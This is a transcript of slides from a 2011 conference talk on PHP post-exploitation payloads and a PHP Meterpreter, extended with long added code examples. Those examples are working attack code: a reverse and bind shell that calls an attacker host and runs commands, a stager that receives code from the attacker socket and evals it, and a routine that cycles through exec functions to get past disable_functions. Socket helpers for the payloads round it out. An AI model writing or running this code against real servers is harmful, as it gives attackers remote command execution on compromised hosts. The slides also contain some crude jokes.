Beyond r57


Presented at BSides Las Vegas, 2011

Transcript of Beyond r57

Page 1: Beyond r57

Beyond r57

[email protected]

Page 2: Beyond r57

Outline

Page 3: Beyond r57

PHP Background

• It’s terrible

• It’s always been terrible

• Objects are an afterthought

• Function names aren’t consistent

Page 4: Beyond r57
Page 5: Beyond r57
Page 6: Beyond r57
Page 7: Beyond r57

Why bother?

• Existing PHP shells like r57 have to be uploaded and configured

– Leaves logs and files on disk

• Some call home to their authors

• They all focus on the server

– Maybe the database, too

• Nothing looks beyond the server, to the network

Page 8: Beyond r57
Page 9: Beyond r57

Rome Wasn’t Sacked in a Day

• Build payloads from simple -> complex

Page 10: Beyond r57

Essence of Payloads

• Create form of communication

• Do your bidding

Page 11: Beyond r57

Simplest: Exec

• Just run a system command

• Don’t care about input/output

• php/exec

Page 12: Beyond r57

Slightly Less Simple: download-exec

• Go grab an executable from a listening webserver

• Save it to disk and run it

• Still don’t care about input/output

• php/download_exec

Page 13: Beyond r57

More Complex: shell

• Need to have a comm channel

• Listen for input and send back output

• php/reverse_tcp

• php/bind_tcp
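Both shell flavours, reduced to their essentials, as an added example (this is not the talk's code, nor Metasploit's php/reverse_tcp or php/bind_tcp). ATTACKER_HOST, ATTACKER_PORT and USE_BIND are assumed values; the command runner is deliberately just shell_exec(), with the disable_functions fallbacks left for later.

```php
<?php
// Added example, not from the talk or Metasploit: the "shell" rung of the
// ladder in plain PHP, reverse and bind. ATTACKER_HOST, ATTACKER_PORT and
// USE_BIND are assumed values.
define('ATTACKER_HOST', '192.0.2.10'); // assumed (TEST-NET-1 address)
define('ATTACKER_PORT', 4444);         // assumed
define('USE_BIND', false);             // false: reverse_tcp, true: bind_tcp

// Reverse: the web server connects out to a listener such as "nc -l 4444"
// on the attacker side. fsockopen() exists all the way back to PHP 4.
function connect_back($host, $port)
{
    $sock = @fsockopen($host, $port, $errno, $errstr, 30);
    return $sock ? $sock : false;
}

// Bind: the web server listens and the attacker connects in. Needs PHP 5
// (stream_socket_server) and an inbound path through whatever filtering
// sits in front of the host, which is why reverse is the usual default.
function bind_and_accept($port)
{
    $srv = @stream_socket_server("tcp://0.0.0.0:$port", $errno, $errstr);
    if (!$srv) {
        return false;
    }
    $conn = @stream_socket_accept($srv, 3600); // wait up to an hour for a client
    fclose($srv);
    return $conn ? $conn : false;
}

// The shell loop itself: one command line in, its output out, until "exit".
function serve_shell($sock)
{
    set_time_limit(0);        // max_execution_time would otherwise kill us
    ignore_user_abort(true);  // keep running if the HTTP client disconnects
    fwrite($sock, "php shell on " . php_uname('n') . "\n");
    while (!feof($sock)) {
        $line = fgets($sock);
        if ($line === false) {
            break;
        }
        $cmd = trim($line);
        if ($cmd === '') {
            continue;
        }
        if ($cmd === 'exit') {
            break;
        }
        $out = shell_exec($cmd . ' 2>&1'); // merge stderr so errors come back too
        fwrite($sock, ($out === null ? '' : $out) . "\n");
    }
    fclose($sock);
}

$sock = USE_BIND ? bind_and_accept(ATTACKER_PORT)
                 : connect_back(ATTACKER_HOST, ATTACKER_PORT);
if ($sock) {
    serve_shell($sock);
}
```

The two calls at the top of serve_shell() are the ones people forget: without set_time_limit(0) the interpreter tears the script down after max_execution_time, and without ignore_user_abort() the shell dies the moment the HTTP request that started it is closed.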

Page 14: Beyond r57

Meterpreter

• Flexible, extensible, capable

• php/meterpreter/reverse_tcp

• php/meterpreter/bind_tcp

Page 15: Beyond r57

Meterpreter for Pwned Home Pages

• Doesn’t have to be on disk

• Uses the same protocol and extension system

– The existing client works just fine

• Does as much as possible w/o using a shell

– Works in a chroot, doesn’t require /bin/sh

• Platform independent; works anywhere PHP works

Page 16: Beyond r57

Meterpreter Required Reading

• “Beyond EIP” 2006

– skape and spoonm, Blackhat Federal

• “Hacking Macs for Fun and Profit” 2009

– Dino dai Zovi and Charlie Miller, CanSecWest

Page 17: Beyond r57

Why is Meterpreter cool?

• Works even in restrictive environments

• Not limited to installed commands

• If it has more access, it can do cooler stuff

• Programmatically automatable

Page 18: Beyond r57

Meterpreter screenie

Page 19: Beyond r57

Meterpreter

• Flexible extension system

• Uses a (mostly) binary protocol

– TLV (Type, Length, Value)

– Designed for extensibility

Page 20: Beyond r57

Meterpreter Protocol

Length    Type      Value …..
4 bytes   4 bytes   ($length - 8) bytes

The value of a packet is itself a run of TLVs with the same layout:

Length    Type      Value …..

Page 21: Beyond r57

Meterpreter Protocol

• Packets are themselves TLVs

• TLVs make parsing simple and flexible

– No formatting knowledge is required outside of the TLV structure

– Allows a core packet parsing engine without any knowledge of extensions or their protocols
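The framing from the last two slides, written out in PHP as an added example (not the talk's code and not Metasploit's own TLV implementation). The meta-type bits and the three concrete types (METHOD, REQUEST_ID, RESULT) follow the definitions in Metasploit's tlv.rb; the method name and request id in the round trip at the bottom are constructed sample data.

```php
<?php
// Added example, not the talk's or Metasploit's code: the TLV framing from
// the slides in PHP. Every TLV is a 4-byte big-endian length (which counts
// the 8-byte header), a 4-byte big-endian type, then ($length - 8) bytes of
// value. A packet is itself a TLV whose value is a run of child TLVs.
define('TLV_META_TYPE_STRING', 1 << 16);
define('TLV_META_TYPE_UINT',   1 << 17);
define('TLV_META_TYPE_RAW',    1 << 18);
define('TLV_META_TYPE_GROUP',  1 << 30);
define('TLV_TYPE_METHOD',      TLV_META_TYPE_STRING | 1);
define('TLV_TYPE_REQUEST_ID',  TLV_META_TYPE_STRING | 2);
define('TLV_TYPE_RESULT',      TLV_META_TYPE_UINT | 4);
define('PACKET_TYPE_REQUEST',  0);
define('PACKET_TYPE_RESPONSE', 1);

// The parentheses matter: == binds tighter than & in PHP.
function tlv_is($type, $meta)
{
    return ($type & $meta) == $meta;
}

function tlv_pack($type, $value)
{
    if (tlv_is($type, TLV_META_TYPE_STRING)) {
        $value .= "\0";             // strings go on the wire NUL-terminated
    } elseif (tlv_is($type, TLV_META_TYPE_UINT)) {
        $value = pack('N', $value); // 32-bit big-endian
    }                               // RAW and GROUP values are used as-is
    return pack('NN', 8 + strlen($value), $type) . $value;
}

// Parse back-to-back TLVs into a list of array($type, $value). Nothing here
// needs to know what a type means, which is what lets the core parser stay
// ignorant of the extensions.
function tlv_unpack_all($buf)
{
    $out = array();
    $off = 0;
    $end = strlen($buf);
    while ($off + 8 <= $end) {
        $hdr = unpack('Nlen/Ntype', substr($buf, $off, 8));
        $len = $hdr['len'];
        if ($len < 8 || $off + $len > $end) {
            break;                  // truncated, or a hostile length field
        }
        $type = $hdr['type'];
        $raw = $len > 8 ? substr($buf, $off + 8, $len - 8) : '';
        if (tlv_is($type, TLV_META_TYPE_STRING)) {
            $value = rtrim($raw, "\0");
        } elseif (tlv_is($type, TLV_META_TYPE_UINT)) {
            $u = unpack('Nv', str_pad($raw, 4, "\0"));
            $value = $u['v'];
        } elseif (tlv_is($type, TLV_META_TYPE_GROUP)) {
            $value = tlv_unpack_all($raw); // nested TLVs, same parser
        } else {
            $value = $raw;
        }
        $out[] = array($type, $value);
        $off += $len;
    }
    return $out;
}

function packet_build($ptype, $tlvs)
{
    $body = '';
    foreach ($tlvs as $t) {
        $body .= tlv_pack($t[0], $t[1]);
    }
    return tlv_pack($ptype, $body); // the packet is just one more TLV
}

function packet_parse($raw)
{
    $hdr = unpack('Nlen/Ntype', substr($raw, 0, 8));
    $body = $hdr['len'] > 8 ? substr($raw, 8, $hdr['len'] - 8) : '';
    return array($hdr['type'], tlv_unpack_all($body));
}

// Round trip a constructed request and the response a payload would return.
$req = packet_build(PACKET_TYPE_REQUEST, array(
    array(TLV_TYPE_METHOD,     'core_channel_open'),
    array(TLV_TYPE_REQUEST_ID, '12345678'),
));
$resp = packet_build(PACKET_TYPE_RESPONSE, array(
    array(TLV_TYPE_REQUEST_ID, '12345678'),
    array(TLV_TYPE_RESULT,     0),
));
foreach (array($req, $resp) as $pkt) {
    list($ptype, $tlvs) = packet_parse($pkt);
    printf("packet type %d, %d bytes, %d TLVs\n", $ptype, strlen($pkt), count($tlvs));
    foreach ($tlvs as $t) {
        printf("  type 0x%08x value %s\n", $t[0],
            is_array($t[1]) ? '(group)' : var_export($t[1], true));
    }
}
```

The length check in tlv_unpack_all() is the one piece of defensive code worth keeping even in a payload: the peer controls the length field, and a length smaller than the header or larger than the buffer would otherwise send the loop backwards or off the end.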

Page 22: Beyond r57

Meterpreter Ruby API

• Powerful and flexible scripting capabilities

• Extensions create an attribute under the main client object

• Various bits of info in each extension

– client.sys.config.sysinfo

– client.net.socket.create_tcp_client_channel

Page 23: Beyond r57

Challenges of doing all this in PHP

Page 24: Beyond r57

Liabilities

• Magic Quotes

• Size restrictions

• Safe mode

• disable_functions setting in php.ini

• PHP Quirks

Page 25: Beyond r57

We Don’t Need No Stinking Quotes

Page 26: Beyond r57

Size Restrictions

• URL length is limited; 4000 bytes is a safe working figure on Apache (the LimitRequestLine default is 8190 bytes, but proxies in the path often allow less)

• Total length of an HTTP header value is 8190 bytes (Apache's LimitRequestFieldSize default)

• Solution is the same as for other kinds of shellcode: stagers

– Setup some kind of communication with the attacker, read in more code, eval
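The shape of such a stager, as an added example (not the talk's code and not Metasploit's php stager). Stripped of comments it fits comfortably inside a URL or a header. Host and port are assumed; the attacker-side listener is assumed to send pack('N', strlen($stage)) . $stage, where $stage is PHP source without a leading "<?php".

```php
<?php
// Added example, not from the talk or Metasploit: a PHP stager. One
// connection, a 4-byte big-endian length, exactly that many bytes of PHP,
// eval. Host and port are assumed values.
$h = '192.0.2.10'; // assumed
$p = 4444;         // assumed

// fread() on a socket may return short reads, so loop until $n bytes arrive.
function read_exact($s, $n)
{
    $b = '';
    while (strlen($b) < $n && !feof($s)) {
        $c = fread($s, $n - strlen($b));
        if ($c === false || $c === '') {
            break;
        }
        $b .= $c;
    }
    return $b;
}

$s = @fsockopen($h, $p, $en, $es, 30);
if (!$s) {
    die();
}
$hdr = read_exact($s, 4);
if (strlen($hdr) != 4) {
    die();
}
$a = unpack('Nlen', $hdr);
$len = $a['len'];
if ($len <= 0 || $len > 16 * 1024 * 1024) { // sanity cap, an assumed limit
    die();
}
$stage = read_exact($s, $len);
if (strlen($stage) != $len) {
    die();
}
$GLOBALS['msgsock'] = $s; // the stage reuses this socket: no second connection, no second log line
eval($stage);
die();
```

Handing the open socket to the stage through $GLOBALS is the detail that keeps the stager small: the stage never has to repeat the connection logic, and the only thing the web server ever logged was the one request that carried the stager.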

Page 27: Beyond r57

Safe Mode

• Kind of a bummer for some things

• Restricts file access and command execution (file operations are checked against the script owner's UID, and commands may only be run from safe_mode_exec_dir)

• Doesn't limit sockets in any way

• Deprecated in PHP 5.3 and removed in 5.4, so on anything newer it simply isn't there

Page 28: Beyond r57

disable_functions setting

• Sucks

• Can try a bunch of different functions with similar purposes until one works

– shell_exec -> passthru -> system -> popen …

• Esser's memory corruption fu (Stefan Esser's bugs in the interpreter itself, which sidestep the restriction entirely)

Page 29: Beyond r57

PHP Quirks

• Stream vs Socket Resources

– fsockopen() returns a stream, socket_create() returns a socket; the two function families do not mix

– stream_select() vs socket_select()

• Operator precedence

– $var & CONST == CONST does not do what it looks like

– == binds tighter than &, so PHP reads it as $var & (CONST == CONST)

– which is $var & 1; always parenthesise the mask: ($var & CONST) == CONST

• Can't assume anything newer than PHP 4.3 on the target
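The precedence trap, made concrete as an added example (not from the talk): a file-mode check written the natural-looking way silently tests the world-execute bit instead of the owner-write bit. The sample modes are constructed.

```php
<?php
// Added example, not from the talk: the precedence trap from this slide.
// In PHP, == binds tighter than &, so "$mode & 0200 == 0200" is parsed as
// "$mode & (0200 == 0200)", i.e. "$mode & 1": it tests the wrong bit.
define('S_IWUSR', 0200); // owner-write bit, octal
define('S_IXOTH', 0001); // world-execute bit, the one the bug really tests

function owner_writable_buggy($mode)
{
    return ($mode & S_IWUSR == S_IWUSR) != 0;  // same as ($mode & 1) != 0
}

function owner_writable_fixed($mode)
{
    return (($mode & S_IWUSR) == S_IWUSR);    // parenthesise the mask
}

// Constructed sample modes: array(mode, expected answer)
$samples = array(
    array(0644, true),   // rw-r--r--: owner may write, nobody may exec
    array(0444, false),  // r--r--r--: nobody may write
    array(0555, false),  // r-xr-xr-x: not writable, but world-executable
    array(0755, true),   // rwxr-xr-x: writable and world-executable
);
foreach ($samples as $s) {
    list($mode, $want) = $s;
    printf("%04o buggy=%s fixed=%s expected=%s\n",
        $mode,
        owner_writable_buggy($mode) ? 'yes' : 'no',
        owner_writable_fixed($mode) ? 'yes' : 'no',
        $want ? 'yes' : 'no');
}
```

The buggy column follows S_IXOTH rather than S_IWUSR, so it agrees with the expected column only on the two modes where both bits happen to line up. The same mistake in a TLV type check would mis-classify every type, which is why the mask there is always parenthesised.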

Page 30: Beyond r57

Assets

• Many ways of doing the same thing

– System Commands, Sockets

• Your brains, his strength, my steel.

Page 31: Beyond r57

Running System Commands

• system, exec, popen, pcntl_exec, shell_exec, passthru, proc_open

• A few non-default extensions: perl, win32std, win32services, almost certainly others
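A runtime fallback through that list, as an added example serving both the disable_functions slide and this one (it is not the talk's code or Metasploit's). On the PHP of this era function_exists() still reports a disabled function as present, so the disable_functions list is parsed explicitly. pcntl_exec is left out because it replaces the process and returns nothing; the perl and win32 extensions are left out because their availability is anyone's guess.

```php
<?php
// Added example, not the talk's code: pick a working command-execution
// primitive at runtime. disable_functions is a comma-separated list in
// php.ini; function_exists() still returns true for entries on it, so the
// list is checked explicitly before each candidate is tried.
function disabled_functions()
{
    $out = array();
    foreach (explode(',', ini_get('disable_functions')) as $f) {
        $f = strtolower(trim($f));
        if ($f !== '') {
            $out[$f] = true;
        }
    }
    return $out;
}

function usable($fn)
{
    static $disabled = null;
    if ($disabled === null) {
        $disabled = disabled_functions();
    }
    return function_exists($fn) && !isset($disabled[$fn]);
}

// Returns array(output, name_of_primitive_used), or false if nothing works.
// The order is a preference: the ones that hand back a string come first.
function run_cmd($cmd)
{
    $cmd .= ' 2>&1';                       // merge stderr into what we capture
    if (usable('shell_exec')) {
        $o = shell_exec($cmd);
        return array($o === null ? '' : $o, 'shell_exec');
    }
    if (usable('passthru')) {              // prints directly, so buffer it
        ob_start();
        passthru($cmd);
        return array(ob_get_clean(), 'passthru');
    }
    if (usable('system')) {                // same deal as passthru
        ob_start();
        system($cmd);
        return array(ob_get_clean(), 'system');
    }
    if (usable('exec')) {                  // returns lines, without newlines
        exec($cmd, $lines);
        return array(implode("\n", $lines) . "\n", 'exec');
    }
    if (usable('popen')) {                 // read the command's stdout as a pipe
        $o = '';
        $h = popen($cmd, 'r');
        if ($h) {
            while (!feof($h)) {
                $o .= fread($h, 8192);
            }
            pclose($h);
        }
        return array($o, 'popen');
    }
    if (usable('proc_open')) {             // capture fd 1; stderr is already merged
        $p = proc_open($cmd, array(1 => array('pipe', 'w')), $pipes);
        if (is_resource($p)) {
            $o = stream_get_contents($pipes[1]);
            fclose($pipes[1]);
            proc_close($p);
            return array($o, 'proc_open');
        }
    }
    return false; // all of them disabled: time for Esser's memory corruption fu
}

$r = run_cmd('id');
if ($r === false) {
    echo "no exec primitive available\n";
} else {
    list($out, $via) = $r;
    echo "[$via] $out";
}
```

Newer PHP (8.0 and later) removes disabled functions outright, so function_exists() alone becomes sufficient there; the explicit list check costs nothing and keeps the same code working on the 4.3-era targets the talk warns about.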

Page 32: Beyond r57

Communications

• Use the webserver

– Simple, effective. Most existing payloads do this

– Leaves logs =(

• Programs on the system: nc, bash, ftp, …

– No guarantee they’ll be there or work

• Sockets

Page 33: Beyond r57

Sockets

• fsockopen, pfsockopen, socket_create, stream_socket_client, fopen

• Extensions: curl, perl (wtf?)
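Opening a connection with whichever of those APIs the host allows, and then hiding the stream-versus-socket split (the quirk from a few slides back) behind a handful of wrappers, as an added example that is not the talk's code or Metasploit's. The host and port are assumed; curl and perl are left out because neither gives you a raw socket.

```php
<?php
// Added example, not from the talk: open an outbound TCP connection with
// whichever socket API exists, then wrap read/write/select so the rest of
// the payload never has to know whether it holds a stream or a socket.
// stream_select() and socket_select() are not interchangeable: each one
// rejects the other's resource type.
function open_tcp($host, $port)
{
    if (function_exists('stream_socket_client')) {       // PHP >= 5.0
        $s = @stream_socket_client("tcp://$host:$port", $en, $es, 30);
        if ($s) {
            return array('stream', $s);
        }
    }
    if (function_exists('fsockopen')) {                  // PHP 4 as well
        $s = @fsockopen($host, $port, $en, $es, 30);
        if ($s) {
            return array('stream', $s);
        }
    }
    if (function_exists('socket_create')) {              // ext/sockets
        $s = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($s && @socket_connect($s, $host, $port)) {
            return array('socket', $s);
        }
    }
    return false;
}

function sock_write($c, $data)
{
    list($kind, $s) = $c;
    return $kind == 'stream' ? fwrite($s, $data) : socket_write($s, $data);
}

function sock_read($c, $n)
{
    list($kind, $s) = $c;
    return $kind == 'stream' ? fread($s, $n) : socket_read($s, $n);
}

// Wait up to $sec seconds for data, using the select() that matches.
function sock_readable($c, $sec)
{
    list($kind, $s) = $c;
    $r = array($s);
    $w = null;
    $e = null;
    if ($kind == 'stream') {
        return stream_select($r, $w, $e, $sec) > 0;
    }
    return socket_select($r, $w, $e, $sec) > 0;
}

function sock_close($c)
{
    list($kind, $s) = $c;
    if ($kind == 'stream') {
        fclose($s);
    } else {
        socket_close($s);
    }
}

$c = open_tcp('192.0.2.10', 4444); // assumed listener
if ($c === false) {
    die("no socket API available\n");
}
sock_write($c, "hello\n");
if (sock_readable($c, 5)) {
    echo sock_read($c, 1024);
}
sock_close($c);
```

Carrying the kind alongside the handle is the whole trick: once every caller goes through sock_read()/sock_write()/sock_readable(), the choice of API made in open_tcp() stops leaking into the protocol code above it.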

Page 34: Beyond r57

Files

• fopen is usually enough

– Nobody disables it because it would break everything

Page 35: Beyond r57

Future

• Javaterpreter, JSPterpreter

– Already in the works, written by mihi

• ASPterpreter?

• Macterpreter/POSIX Meterpreter

– Most of the code is there but is not really usable

Page 36: Beyond r57

What should I call it?

• PHP Meterpreter, php-terpreter

• meterphpreter (pronounced “meterfpreter”)

• phpterpreter (pronounced “fapterpreter”)

• phpsucksmyballsterpreter

Page 37: Beyond r57

Demos

Page 38: Beyond r57

Questions

8=====D